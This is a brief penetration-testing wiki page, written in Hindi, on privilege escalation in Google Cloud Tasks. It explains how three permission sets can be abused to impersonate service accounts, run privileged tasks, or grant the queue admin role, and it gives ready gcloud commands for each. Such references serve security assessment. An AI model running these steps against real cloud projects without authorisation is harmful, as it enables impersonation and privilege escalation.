GCP - Cloud Tasks Privesc

Reading time: 3 minutes

Cloud Tasks

cloudtasks.tasks.create, iam.serviceAccounts.actAs

इन अनुमतियों के साथ एक हमलावर अन्य सेवा खातों का अनुकरण कर सकता है, जो निर्दिष्ट सेवा खाते की पहचान के साथ कार्यों को बनाने की अनुमति देता है। यह IAM-संरक्षित Cloud Run या Cloud Functions सेवाओं को प्रमाणीकृत HTTP अनुरोध भेजने की अनुमति देता है।

gcloud tasks create-http-task \
task-$(date '+%Y%m%d%H%M%S') \
--location us-central1 \
--queue <queue_name> \
--url 'https://<service_name>.us-central1.run.app' \
--method POST \
--header 'X-Hello: world' \
--body-content '{"hello":"world"}' \
--oidc-service-account-email <account>@<project_id>.iam.gserviceaccount.com

cloudtasks.tasks.run, cloudtasks.tasks.list

इन अनुमतियों के साथ एक हमलावर मौजूदा निर्धारित कार्यों को चला सकता है बिना उस कार्य से जुड़े सेवा खाते पर अनुमतियों के। यह उच्च विशेषाधिकार वाले सेवा खातों के साथ पहले से बनाए गए कार्यों को निष्पादित करने की अनुमति देता है।

gcloud tasks run projects/<project_id>/locations/us-central1/queues/<queue_name>/tasks/<task_id>

इस कमांड को निष्पादित करने वाला प्रमुख iam.serviceAccounts.actAs अनुमति की आवश्यकता नहीं है कार्य की सेवा खाते पर। हालाँकि, यह केवल मौजूदा कार्यों को चलाने की अनुमति देता है - यह कार्यों को बनाने या संशोधित करने की क्षमता नहीं देता है।

cloudtasks.queues.setIamPolicy

इस अनुमति के साथ एक हमलावर अपने लिए या अन्य प्रमुखों को Cloud Tasks भूमिकाएँ प्रदान कर सकता है विशिष्ट कतारों पर, संभावित रूप से roles/cloudtasks.admin तक बढ़ते हुए, जिसमें कार्यों को बनाने और चलाने की क्षमता शामिल है।

gcloud tasks queues add-iam-policy-binding \
<queue_name> \
--location us-central1 \
--member serviceAccount:<account>@<project_id>.iam.gserviceaccount.com \
--role roles/cloudtasks.admin

यह हमलावर को किसी भी सेवा खाते को जो वे नियंत्रित करते हैं, कतार पर पूर्ण Cloud Tasks व्यवस्थापक अनुमतियाँ देने की अनुमति देता है।

संदर्भ

• Google Cloud Tasks Documentation